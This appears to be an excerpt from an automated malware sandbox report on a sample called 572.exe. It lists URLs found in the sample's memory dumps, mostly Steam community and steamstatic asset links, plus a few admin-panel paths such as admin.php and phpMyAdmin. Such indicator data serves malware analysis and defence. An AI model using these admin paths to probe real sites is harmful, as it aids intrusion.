                Source: 572.exe, 00000009.00000003.4238582525.0000000047A2A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.000000000624B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts&browsefilter=partner_streams
                Source: 572.exe, 00000009.00000003.4306089773.000000004E766000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/admin.php
                Source: 572.exe, 00000009.00000003.4337138614.000000004DAF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/administrator/
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: 572.exe, 00000009.00000003.4003323359.000000003911E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/phpmyadmin/T
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://storage.googleapis.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://storage.googleapis.com;
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/css/v6/creator_hub.css?v=e6oxFOI4knLo&amp;l=english&
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/css/v6/home.css?v=Lz7cbKXK809q&amp;l=english&amp;_cd
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/css/v6/store.css?v=tE2OH3fD5emJ&amp;l=english&amp;_c
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/images//gift/steamcards_promo_03.png?v=1
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/images//steamdeck/steamdeck_promo_01.png?v=2
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/images/blank.gif
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/images/footerLogo_valve_new.png
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/images/ico/ico_twitter.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/images/mobile/ResponsiveChevron.svg
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/images/v6/logo_steam_footer.png
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/javascript/broadcast_carousel.js?v=K-35hu3B5oAZ&amp;
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/javascript/cluster.js?v=TjmKiV2Gsmra&amp;l=english&a
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/javascript/dynamicstore.js?v=Nd21hnbFh_KC&amp;l=engl
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/javascript/home.js?v=-caMhVCK_Iw-&amp;l=english&amp;
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/javascript/main.js?v=D06GikNhhtkc&amp;l=english&amp;
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=Grv-5yNFuEfg&amp;l=english&
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=2C1Oh9QFVTyK&amp;l=engl
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2U002L4q3GO-&amp;l=en
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=CG8Em6e-Ozq3&amp;
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/images/trans.gif
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/javascript/jquery-1.8.3.min.js?v=.TZ2NKhB-nli
